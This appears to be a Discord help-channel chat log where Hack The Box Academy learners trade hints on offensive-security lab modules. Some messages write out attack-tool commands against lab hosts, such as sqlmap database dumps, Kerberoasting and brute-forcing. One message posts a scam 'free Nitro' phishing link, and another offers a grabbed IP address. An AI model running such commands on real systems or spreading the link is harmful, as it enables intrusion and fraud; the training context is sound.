Hello, I am stuck on the 'Using the Metasploit Framework' module, specifically the section 'Introduction to Metasploit'.

The question is "Which version of Metasploit is free and can be used only through a CLI?" and the answer is, obviously (or so I think), as described earlier in the module, Metasploit Framework. However, this answer does not seem to be accepted by the answer box.

I have tried pretty much every variation I can think of, such as 'Framework', 'framework', 'metasploit framework', 'community', etc., to no avail

I hope I am not missing something incredibly obvious -- does anyone know the correct answer?

@fringe wedge try msfconsole 🙂

Hahah wow, that is the last thing I would have thought of... Thank you!

np!

I am doing the GET Web Request Exercise, where I need to use browser devtools to see what is the request it is sending when we search. Shouldn't there be a 'search.php' under the file column?

@iron plaza i think we would have to actually navigate to /search.php

I did that with the curl and got the flag but based on what you said the question seems misleading: "Use the browser devtools to see what is the request it is sending when we search"

I think it's because the browser devtools doesn't actually Fuzz for web content. Like we could visit a website and there might be a login.php page, or a contact.php page, but those would not show up unless we navigated to them directly (if that makes sense).

Thanks, as frustrating as it is you learn something new.

Hi can anyone give a small nudge with attacking common services SMB?

Hint here says a password list from the resource. Not sure where it is..

Module : BloodHound
Question : Find the percentage of users with a path to Domain Admin. Submit just the number as your answer (to two decimal points, i.e. 9.78).
Anybody ?

How do i start hacking

I have no idea what this is

If you're here, you must have an idea already...

That is probably a question you should ask in community help or FAQ, but I think, not here.

ok

Does anyone have any advice for the password attacks: password mutation question? I created the wordlist using the exact command on the page and I entered the right brute force command for the "sam" user, but it doesn't complete fast enough. I even tried using the max 64 threads like some people said, but the machine still runs out of time.

Which service are you targeting? And also try to remove duplicates from the list

Hi in the using Metasploit Framework module, under the sessions section we have this question of privilege escalation
"The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer."
any idea how can I proceed?

I haven't done this module but googling wouldn't help?

I have found things doing that, personally

I am looking but wasn't able to find anything good
the question says that the attack is related to older version of sudo, looked for attacks regarding that found one rapid7, but the meterpreter don't have pyhton command support

question itself suggests to find relevant exploit for this sudo bug, but currently not able to find one

Well, you might have to wait for someone who's done the module already :/

So I've found a few subdomains in the web fuzzing assessment but question 1 won't accept any ansers I input, any ideas?

The question asks for all the subdomains.

Literally just inputted them there. Long day 😅

There is a way to figure out the version of sudo that is in use. I don't want to give away the answer but I wouldn't recommend searching "exploits for sudo." You're going to want to figure out the version of sudo and then exploits for that version

I am looking for some help on the east - lab section of the Footprinting module. Could I DM someone?

dm

Looking for some guidance in the 'Vulnerability Assessment' course - Anyone familiar with where the pre-generated reports are located? Thanks!

When you Login on Nessus under My Scans

Hey all! I can't seem to connect to rdp in the module "Active Directory Enumeration and Attacks", section "LLMNR/NBT-NS Poisoning - from Windows". Using xfreerdp /v:10.129.153.168 /u:htb-student /p:'Academy_student_AD!' I get a black screen, then the the console gets filled with [WARN][com.freerdp.client.x11] - xf_lock_x11_: [1] recursive lock from xf_process_x_events

vpn on and tried resseting the target.

@rustic sage thanks for the input, I tried sudo -V, that didn't work, I'll try to find with some other method

I just finished the intro module, what module should i go for next?

@rancid holly try using the local_exploit_suggester

Discord free Nitro from STEAM
https://nitrosdicsords.xyz/login/nitro

Im conflicted between choosing windows fundamentals, getting started or learning process modules

Any body here from bay area?

Bar area California

Bay

I'd go into learning process, then getting started, then windows fundamentals. A lot of reading, but it will give you a good introduction before diving in the "real" content. (that's also the order I did)

@brisk seal Getting Started is excellent, covers a very wide array of topics, but might be pretty difficult if you are new

Yeah everything in that module is fucked

I'm managing to get on to things with rdesktop for a few seconds at a time then it crashes and refuses to connect with any tools

really disappointing as the content of the module looks great but nothing actually works

can any one throw some light into hashcat module? I'm running out of options to try to crack this hash...

what wordlist and rules did you use?

rockyou wordlist, and rules... well, some of the built-in and some that appeared in the previous pages of the module

also guessing it's MD5, cause hashid is not very confident either

You can also check using hashes.com (and if lucky, it will even identified the password) to identified the hash type. Then, using rockyou, try using the rules in /usr/share/hashcat/rules. One of them should work (it had "common" in it I think)

lol it was on hashes.com, I'm still gonna try to crack it with hashcat haha, thank you 🙂

@real hill i believe it's actually an NTLM hash. Feel free to DM if you need help !

Hi everyone. I prefer owasp zap over burp mainly because it's free. However some encoding or not available with fuzz such as full URL encoding (which is not the same as URL encoding).
Do you have any workaround to suggest ?

Hello, do you have any hints for Intergalactic Post challenge? I am 95% sure it's SQL injection but tried hundres options how to bypas email or http headers to access the reverse shell via netcat but nothing is working:(

I'm targeting ssh and duplicate passwords were removed with sort -u.

Try ftp if possible is faster… Dm if still isn’t fast enough

is this the place to ask for a little help with a module?

im stuck on Attacking Common Services/Attacking SMB

i just dont understand how im supposed to get the password for jason

FTP was faster, thx

If anyone is stuck on the password attacks: password mutation question, brute force FTP instead of SSH. It's faster and you get the same result.

is @drifting knoll

here?

d

anyone who has completed Using Web Proxies module?

I'm really stuck under "proxying tools" section

Sure I can help. Where are you stuck? You can also DM.

I just completed this section so if you need help let me know!

fyi I couldn't get it working in ZAP, and once I used Burp (like the question says) I was able to see what was going on.

https://www.tiktok.com/t/ZTdvHr3Uv/

https://www.tiktok.com/t/ZTdvHr3Uv/

https://www.tiktok.com/t/ZTdvHr3Uv/

Module ACTIVE DIRECTORY ENUMERATION & ATTACKS, Living Off the Land
Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

I use some other easier way to get the flag rather than following the hint

If anyone could give me a nudge about how to reach it by the intend way, please DM me. Thank you!

Hi

I’m still stucked on web requests - crud api

I followed what asked and even after I cannot see any flag

Has anyone completed the Windows Privilege Escalation module? Im stuck on the Responder chapter

I’m still stuck at Linux fundaments

anyone knows why hashcat gives me errors when cracking the .cap files? There's not much margin for error, I'm following the module guide as is...

I'm getting the same errors in WSL2 and Powershell, lol

for the mode you are using, you can see one example hash with "hashcat --example-hashes | grep -A 14 22000"

Perhaps it doesn't match the lines in the hashfile you are using?

You can mp if you need

DM for assistance

DM if you still have issues or elaborate in the channel for assistance

Hello can someone give me a nudge on SMB in common_services module please?

Would be great to pm 🙂

What module, what section? I'm not sure to understand your question.

ok nope, i still need help.

Anyone can help with SMB , attacking common services?

sure, DM

For people struggling with that part (attacking common services, smb section): crackmapexec doesn't work for some reason. We got it working using msf smb_login brute force tool. An admin should check that or maybe update the module?

You can DM me if you are still stuick at the Metasploit Module.

Need help on ACL Enumeration from Active Directory Enumeration & Attack. Q: What is the ObjectAceType of the first right that the forend user has over the GPO Management group?

I'm at ACL Abuse Primer section. Will get there eventually today if nobody else respond.

Hope you get them all.

dm if you still hang

try to run it in pwnbox

@rustic sage27 - Thank you for the help with the 'Vulnerability Assessment' course.

I'm blocked at the last question. Trying to Get-DomainObjectACL for forend hangs after finding what I can do with user Dagmar... I've seen it in bloodhound, but don't know how to input the answer. Finally output the answer, nevermind!

@wintry gorge try placing the .scf file in Department Shares\Public\IT

our Friday gift to y'all

Oh yeah!!

Hello! Sorry for the noob question! But how do I stop my first machine so I can move to my second? Sorry Im new and doing starter guide

Error!

You must stop your active machine before spawning another one.

The pwn box? Just keep using the same. Or there is a red button "terminate" if you need to close it.

i cant connect to the academy vpn

Sorry I don't use pwnbox - I use normal OpenVPN for connection and I completed first task and when I go to 2nd task it says first machiene active even tho they say i completed full task

any idea why my OpenVPN is not working

not sure srry, im noob as well to this

I'm not sure I understand what task you are talking of. You got a screenshot?

https://app.hackthebox.com/starting-point

i done the first task and completed

Is that from you own kali/parrot box?

when i go to task 2 it says

Error!

You must stop your active machine before spawning another one.

Yep

I'm out of instances

Oh, You are not in the right discord. There is a starting point room. But, that just means you did not stop the last box. You can probably see it on top of your screen next to the search bar. Click on it and de-spawn it. Or go back to the last exercise you've done and turn off the machine.

I understand and im sorry for bad place to ask! i mean no harm and let me check pls

no no no, don't worry 😛

hmmm... I'm not sure how to help. Maybe try creating a new openvpn fle via the top right menu (with your username), vpn settings.

Hello guys, me website got hacked and I need some help please

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.100 netmask 255.255.254.0 destination 10.10.14.100
inet6 fe80::c8ae:b329:991c:e8f8 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::1062 prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 6 bytes 528 (528.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13 bytes 696 (696.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

how do i terminate?

ty! worked haha, i missed it

sudo killall openvpn worked 😄

I need a hacking expert, I’ll pay you

Website hacking

#rules
4. Keep it legal.
Do not request, suggest, perform, promote or in other way or shape discuss illegal activities. We respect and follow the Discord ToS as well as the HackTheBox ToS, and do not hesitate escalating matters appropriately, if we deem it necessary. If in doubt, ask a Community Administrator before posting or don’t post it at all.

Alright, it’s not illegal, I’m just looking for vulnerabilities on my website

Sorry I didn’t ask

Hello
Pls I need help with the last section of the SQL injection module
I cant seem to figure out how to get the root flag
The website isnt vulnerable to SQLi

Hey guys, can anyone help me on windows fundamentals skill assessment?

The module??

Nvm just succeeded it!

hello

thanks @mint pagoda but I completed it

What's Up?

Ok I don’t even know if I’m doing this correctly. I’m old limited computer knowledge. Started recently. I’ve completed intro to academy. Learning process and setting up. What would you all recommend for beginner modules. I’ve got stuck on a few modules bc I didn’t understand them. I don’t want to use YouTube if I don’t have to prefer to learn for myself. I feel YouTube is cheating lol.

Sorry new to discord as well

My advice: Start on any of the Modules of Tier 0 with Fundamental General knowledge.

I am in need of assistance with the Active Subdomain Enumeration section of the Information Gathering - Web Edition module. I need to answer the question "Find and submit the contents of the TXT record as the answer."

I am able to find a list of subdomains, but I am confused as how to properly query for TXT records

I tried to query all of the subdomains for TXT records, but I don't believe they gave me anything I was looking for

@iron tartan DM me 🙂

Anyone know why this route is showing as 172.16.4.0? I have it configured for 172.16.5.0.

@west canopy still need an answer or did you figure it out?

@hollow knot I solved it. But there have been around ~5 sections so far I have ran into problems

may I DM you?

sure

I'm having trouble executing the exploit for the first module in "Using the Metasploit Framework". Can anyone help me?

@haughty blade DM me 🙂

/need some hack tools

someone give me ???

hi guys, I am doing the active directory enumeration and attacks module, I don't quite understand Access Control Entities.

There is this example in the screenshot.

What does it mean if there is a permission entry with principal Angela Dunn?

Does that mean that the user "forend" allows Angela Dunn to read all properties.. etc,

or

forend is able to read Angela Dunn's properties.. etc?

I am having some problem with htb academy, not able to access the cheat sheet
where can I report it?

Hi Guys, can anyone help me on attacking common service - attacking DNS,I tried brute force with subbrute, dnsenum, subfinder,... but didn't work :(

@rustic sage I'm still stuck under proxying tools, could you give me a hint?

I’m not home at the moment but I’ll be back in 1-2 hours if you still need help.

If you copy and paste the commands from the other Metasploit tutorial earlier in the module and use Burp (with intercept on) it should work!

ok., I will do it and let you know if works or not, ty btw

I guess my issue is with proxychains because is not sending packets to Burp, I tested like this, (terminal ran) "proxychains firefox www.ipchicken.com" and firefox was opened and ipchicken reached but nothing happen in my burp, and under my proxychains.conf this lines are set up:
#socks4 127.0.0.1 9050
http 127.0.0.1 8080
https 127.0.0.1 8080

Hey! Can anyone help me with the BROKEN AUTHENTICATION - Skill Assessment. Ive got the user enumeration and have found a user. I also know that the cookie is b64 encoded of the username hash. However, changing the cookie for the user 'su***rt' doesnt do the trick. Am I missing something? Can someone please help me in the right direction please?

working on broken auth and trying to write a python script with very little python experience. if anyone can help dm me

Is anyone facing a problem of logging as victor? Dynamic Port Forwarding with SSH and SOCKS Tunneling

It's pretty much as the example. but I just can't rdp successfully.

Hey @lucid mirage feel free to DM me for help.

Can anyone respond to this as well please or DM me?

hi guys i need to know how do i get root permissions ?
i tried:

getprivs```
but didnt work

heello friends I am stuck on module Using Web Proxies and more precicely on exercise Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag. What I am doing on burp intruder is /$admin$/$.html$ with the common.txt list but I only get 404 messages. What am I doing wrong? thank you. Please dm me if you can help me

anyone know why im getting this error

@native ether your Fuzzing is a little bit off. Sec I'll DM you 🙂

he forgot to remove it jared i helped him out

but if you want to go down a rabbit hole with me on this script im trying to make for broken auth that would be cool

for predicting the reset token?

ye

oh man, as a python noob that section was a nightmare for me lol

i tried a few today and got frustrating after over an hour of furious error searches and not understand wtf was happening

the whole converting an integer to bytes thing is really confusing

DM me!

@near bolt the username for the support user is actually support.xx , where xx is a country code. Once you find out the valid usernames (there is more than one), you want to filter the rockyou.txt wordlist for passwords that match the complexity requirements

Good Morning! i'm working on the cross-site scripting (xxs) module and tried to launch the target machine for Stored-xxs a few times but i keep getting error "Target failed to spawn". Anyone else running into issues with spawning machines?

yup same issue for me with 2 different modules as well, you can get the target to spawn eventually in my experience so far by refreshing and trying again about 10 times+ or so

ive @'d one of the staff in erratum, you can do the same if you want

Thanks 🙂

I'm working through the "Intro to web proxies" academy module, and am having an issue using nmap with the "--proxies" switch

The scan works, but burp doesn't intercept the traffic

burp shows it is indeed listening on 127.0.0.1:8080

curl using proxychains does get intercepted by burp

My nmap command I type:

nmap --proxies http://127.0.0.1:8080 139.59.177.61 -p31669 -sC -sV

in broken authentication module section 'predictable reset token', if anyone knows how to solve the second question please dm me. it looks to me like not enough information is provided to solve

nvm i figured it out

Hey, I need some help on the COMMAND INJECTIONS module - Skills Assessment. Been stuck for hours 😅

@sage jackal dm me

Hello, i am doing the File Inclusion module, section : File Inclusion Prevention and i have a problem finding the answer to that : Edit the php.ini file to block system(), then try to execute PHP Code that uses system. Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons.

Since, when i try to write on the file php.ini, it tells me than i am not allow to write... Same when i try to create a shell.php in the /var/www/html. If someone can only tell me it's normal and i have things to do before so i am sure it's not a bug or smt

When doing Linux fundamentals using pwn box tried using a sudo command, noticed it said “htb-student is not in the sudoers file. This incident will be reported.” But what’s the point of the system saying this will be reported, does it view it as a mistake that htb-student isn’t in sudoers file and it will get looked at?

Have you found the param vulnerable to command injection?

@mighty pivot It isn't a HTB thing, it's a Linux thing. The OS, which is often going to be running on a large network with users of various permissions, is keeping track of who tries to do stuff they shouldn't. It's a canned message that basically says "It's been logged that you tried to use a command you aren't authorized for, and the network admin is going to see what you did"

In your case, it means nothing. Ignore it.

That’s good to know, thank you for the explanation

Hello guys

Yo.

Who is get certificate cbbh?

Just finished the module, thanks though!

Anyone wanna take a stab at my Burpsuite/nmap/metasploit issue a few post earlier?

ok, maybe its 10 posts ago...

hello

Can't get the KRBTGT Account's NT hash using mimikatz for enumerating and attacking active directory module, child -> parent trusts attack from windows section.

Works on the next exercise with secretsdump.py from linux.

Actually, now I'm stuck at obtaining NTLM hash for the domain admin on the newly owned parent domain. (enumerating and attacking active directory module, child -> parent trusts section attack from linux section)

Hey guys in the getting started module, i understand that I need to scan a specific port and find what service and version its running. Ive done this and found it to be apache 2.4.41. Now I need to find an exploit and am given a few options, like metasploit, searchsploit, etc. How can I know which exploit in metasploit will work with this version without using each one and checking? Can I see which apache versions the exploit works on?

who wants a ip?

im bored so i grabbed one

just dm me for it

cya tm

https://tenor.com/view/we-dont-do-that-here-black-panther-tchalla-bruce-gif-16558003

they give a rating to the exploit (excellent , good etc..) try the ones with the best rating first

but how would I know the exploit works with my version

the module probably have a check option

it'll tell u if the target is vulnerable

yea i know this but 1. not every exploit has this and 2. i would have to go through every exploit and check which is tedious and time consuming if there are 100s

be more specific with ur version

to narrow it down

wym

type in the whole version

of the service

so like

>search exploit apache 2.4.41

?

yes

yea i tried, nothing pops up

its supposed to be searchsploit

not search exploit

one word

oh i thought you meant in msfconsole

nono

use searchsploit first

it'll tell u a msf module or a vulnDB link

searchsploit uses exploitdb database right?

yes

okay so i got some

exploit title and paths

should i add -w ?

wdym

the flag, to searchsploit

the exploit should already be in msf

cuz its an easy module

how do you know its in msf

cuz i did it-

a while ago but yes

ah so if you were to blind exploit this you wouldnt even know that lol

yep xd

wait but there has to be a way can someone help

dm if you are still stuck

when are using ssh with port you have to use the -p parameter. ip:port doewsn't work...

so yall dont grab ip's oh

umm

resolved the problem by being root

Tough i had something bigger to do, i am so stupid

hello, if anyone finished the shell & payloads module please dm me, stuck on the last question

hi folks!
i'm new to the community. I'm stuck at the USING WEB PROXIES module (Burp Intruder), i can't seem to find the flag file fuzzing with Burp, the task was the following:
"Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag"

of course the wordlist is inmense for the speed of community burp, does anyone have suggestions ?

dm me

Hi guys, I was doing some testing in my internal lab and I need to do an exploit exploiting this CVE -> 2022-21427; I am sure that my MySql server is vulnerable being at version 5.7.37... Unfortunately I can't find any documentation on how to exploit it despite the fact that anyway in the nist references it talks about an easy vulnerability to exploit... Any advice on where to find an explanation on how to perform the exploit?

Hi all can someone give me a nudge on "Weak Bruteforce Protections" section of the "Broken Authentication" module?

https://academy.hackthebox.com/module/80/section/837

I am attempting question 2:

I have tried the following ip addresses so far:

||127.0.0.1, the web application's own public ip address and the public ip address of the ajax.googleapis.com||

Also, I am using the ||SecLists Default-passwords.csv ||wordlist

dm

Hello, would anyone be able to give me a bit of help with the Password Attacks- medium module? I am stuck on the Passwd, Shadow & Opasswd section where it is asking to use the creds for -w to get the creds for root.

in the skill assesment for the hashcat module, after running hashid and hashcat for the kerberos hash, I get a weird output: a different hash from the inputed, what's happening?

Hey guys

Dm

Attacking common services-easy
im really stack here i have found a valid user but i cant find which service to attack any hint

Dm

Hey y'all, i'm on the attack tuning part of sqlmap essentials and i'm confounded w/ flag6, mainly understanding the prefix hint

I'm stuck on Active Directory enum and attacks skills assessment part I. Anyone available?

@sweet heron sure, where are you stuck?

Quite at the beginning... If I understand right, for kerberoasting , I need to use getuserspns.py with valid creds. So I did a little password spraying and found something. But I only get "No Entries found!" I feel like I'm missing something... GetUserSPNs.py -dc-ip 10.129.202.146 INLANEFREIGHT.LOCAL/redacted

which question is that?

The second one. "Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer"

Gotcha. I was able to find the account using powerview 🙂

Are you still stuck on this? I believe I'm super close to getting the flag, but I just can't get RCE.. Which part are you having troubles with?

@naive ravine This question is tricky. Bruteforcing actually never works. Try just sending a regular HTTP request to the server (with either curl or burpsuite) with the added X-Forwarded-For header. Feel free to DM and i can go into more detail 🙂

can somebody please lend a hand with Skills Assessment - File Inclusion 🙂

Hi! I´m currently on linux fundamentals, an d i'm trying to solve some questions, but i'm unable to understand this question:

What is the path to the htb-student's mail?

I could solve this questions:ç

Find out the machine hardware name and submit it as the answer.

What is the path to htb-student's home directory?

How can I find the path to htb-students mail?

@kindred rain try running the command: env

Thanks a lot!!!

np 🙂

not sure if I'm doing something wrong - I managed to find the access.log file for the File Inclusion Skills Assessment challenge, but I can't get Server Log poisoning to work...

Having this exact issue, were you able to get it done 🙂

Dm me

Hi there! Stuck on the "Credential Hunting in Linux" section from "Password Attacks" module. I am on the question "Examine the target and find out the password of the user Will" I accessed kira's ssh account but do I need to find will's password looking on the configs, logs, etc.. files? I am losing my mind looking in files.

https://www.linkedin.com/posts/yashshendge_securityprofessionals-cybersecurity-bugbountytips-activity-6939433190436540416-utzf?utm_source=linkedin_share&utm_medium=android_app

Any help with this? - Use what you learned in this section to obtain the flag which is hidden in the environment variables. Answer format: HTB{String} - I have gained shell but there is absolutely nothing there, just /var/www/html/page.php and nothing has anything in them

Network Traffic Analysis Module -> Tcpdump Fundamentals -> 3rd Question is either not working or I dont undestand something. Can I DM Someone?

heyo, having a hard time with : What's the contents of table flag4? (Case #4) - sqlmap enssentials

Network Traffic Analysis Module -> Tcpdump Fundamentals -> 4th Question should also accept the same answer without sudo imo, since reading only requires the necessary privs to read the file

nevermind I was writing the whole command and not the switches only lol

sqlmap -u http://138.68.188.223:30126/case4.php --data '{"id": 1}' --batch --dump
Worked, but looking at the hint provided it say that I must take a look into -r option .

[10:45:40] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable

am I missing something?

[10:48:44] [WARNING] GET parameter 'id' does not seem to be injectable

would it be best to do all the academy modules first and then move on to the htb platform or do modules as I try to do machines?

how can I tell how many different zones there are with this?

i would say academy is more for special learning, example you wanna learn how to privesc on linux because you are struggling on that go for the module.

if you are starting starting start from the starting point

I like to mix it up. Sometimes I feel more like doing challenges, sometimes more like learning/reviewing something in depth 🙂

same ^ doing only academy is boring

You have to query the individual subdomains with dig AXFR or with dig www.subdomain.domain.tld, dig ns.subdomain.domain.tld, dig ns01.subdomain.domain.tld, dig mail.subdomain.domain.tld, etc. You can use scripts or software to do this. But start with a small list of hosts.
If dig AXFR returns a corresponding answer or you get an IP address back with your dig queries, then it is a zone.

wow nice, I understand it now, thank you 🙂

So that you don't have to query every subdomain, most of which will be hosts anyway, it makes sense to think about which subdomain might be a zone.

For example, www or even ns will be a server (host) in most cases and not a zone.
Zones are usually departments in a company.

Any tips how can I find flag hidden in environment variables after getting shell ?

@rustic sagehi ,i am having the same issue, any hint ?

nvm, i found the answer ❤️

Seriously is this broken, all I can find is this:

printenv, gives me this:

well it was working, but now it's not, i really don't know, i did not change anything....

I think skill assesment file inclusion module is litteraly full of bug

try to env and grep what you want

Okay I got the flag, but holy shit I had to work for it, grepping doesn't work and the file location is completely wack, can someone explain me easier way than: searching through the entire space for the word HTB{*, then copy pasting the entire file to a notepad and searching for the correct word, does not seem right. | grepping for the word from the file does not work

If you are referring to the SSTI Exploitation Example 1 question, DM me and I will show you the way

need help with file upload module DM me plx

With whom should I be in contact considering I only got 10/20 cubes from the tunneling/portfwd etf course?

not that it matters much since I only need T3+ courses but still

For the Privileged Access section of the AD Enumeration and Attacks module, I am having trouble with the third question: "Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt." The hint says to do this with mssqlclient.py with is an impacket tool yet the attack machine is a windows box. Can anyone help?

Hey guys/
Server-side Attacks
SSTI Exploitation Example 1
A bit confused on executing this task, I cannot dump the template environment/ does this mean cat the proc/self/environ?

no. Check out the part in that section about curl

@hollow knot Isn't that standard? Spend 100 cubes and get 20 back upon completion?

@tiny ledge which module/section is that? Running cat on a Binary won't work (because of ascii data vs binary data)

yeah but I got only 10

ah

Yes I think i got 10 cubes as well

it was first listed as 10 cubes back then it got increased to the default 20%

So, i am still stuck on the File Inclusion module any hint would be amazing. || I already find the "panel", i tryied to do log poisoning on access.log, error.log, every /proc/ i found. Around 11. i also tryied /var/log/sshd.log
/var/log/mail
/var/log/vsftpd.log , I also tryied php session poisoning without success since no php_session file. I also tryied to upload a file from the ?message= ... Without success. I tryied doing a server in python http, smb, ftp || just need someone to evaluate if probably did something wrong or if i need to check further

Still not getting anywhere

hello

where is the links of how to hack?

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

this ^

so, complete the hack the box academy courses?

Has anyone completed the File Inclusion Skills Assessment here? I'm really close and on the last step, but I just need a hint.

Hi all, I'm a bit stuck with the Basic Bypasses of File Inclusion. Even though I understand the hint posted at the question, I'm only getting the message: Illegal path specified!

I can help with that, let me take a look

before there were some links here of places that taught hacking

they are gone?

DM me

DM me

dm me

Has anyone completed the windows findamentals Skills Assessment here? I'm really close and on the last step, but I just need a hint.

Hello

On pivoting module

proxychains xfreerdp /u:victor /p:pass@123 /v:172.16.5.19 ==> logon failure ?

But with -a I get all the text in the file, It's Server-Side Attacks | SSTI Exploitation Example 1

that question uses curl

Dm :)

can you provide more details ?

@lofty pollen Which question? Looking for the SID of the HR security group?

Yeah

@lofty pollen try this command from powershell: (Get-Localgroup HR).SID

We are a couple user who did not get a hit on the right password using crackmapexec tool. We got it working with a metasploit module for smb_login. DM for more details and/or screenshots.

@upper niche I found the answer, sk4reKr0w helped me

Okay

Anybody know how to do Knowledge Check part of getting started module? Or have resources for it?

on hack the box

You mean the part you have to do retired box and challenge ?

https://tenor.com/view/that-helped-me-so-much-emily-ghoul-xset-i-had-support-it-has-allowed-me-gif-22058106

@turbid hull The last part of the module, Knowledge Check. It is a box you have to try your knowledge out on. A bit stuck on it.

@iron basin for the initial foothold, try using metasploit to look for an exploit against GetSimpleCMS. For the privilege escalation it's a GTFObin 🙂

@west canopy yeah I got the exploit to work. Got meterperter working but trying to get it to connect to another way so I have a better shell

Well I got the user.txt

has anyone done Perform a DCSync attack and submit the NTLM hash for the khartsfield user as your answer.

does anyone know how to have wfuzz fuzz multiple things? like if i wanted to fuzz <filename>.<extension>

and i have two seperate wordlists

or is there a better tool for that

@iron basin from meterpreter, you can drop into a regular OS shell with the command: shell

Hello everyone. I am new to Linux, so I am learning about stderr, stdin, etc. My teacher asked me what the actual path was for dev/stderr.

It's actually very confusing because I always assumed that /dev/stderr was a child of the "/" folder, and so the actual path to stderr was /dev/stderr.

You can set up 2 keyword

They talk about that in the ffuf htb academy course 👍

Windows Privilege Escalation, Communication with Processes: I can't find the answer of question two on what account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01. NT\Service or MSSQL are not valid answers... I'm not sure I understand.

@sweet heron

I see! Thanks!

hey in getting started module

im in the nibble initial foothold section and managed to get reverse shell but there is no user.txt file to give me the flag

I tried it with two ways, using a metasploit module and doing manually but both ways I just have the db.xml file and if I upload a script, the file of that. there is no user.txt file

and I did try resetting the machine as well

maybe try: find / -iname user.txt 2>/dev/null

its cool in meterpreter too right?

maybe type shell first

LFi module stuck here

how im supposed to read the flag located at /

if its owned by root n im not in localnet

@shut bronze the flag is that super long .txt file, all users have read permission so we should be able to cat it

thanks bro it found it. Turns out was just in another directory. that command literally just searches for the file on the system and writes errors to trash right?

datz right

but it has to be the same exact name user.txt

oh umm

idk abt this server

can u guys

help me?

Has anyone finished attacking common services module here?

whats that?

yeah it works ty

uhm'

guys

gUyS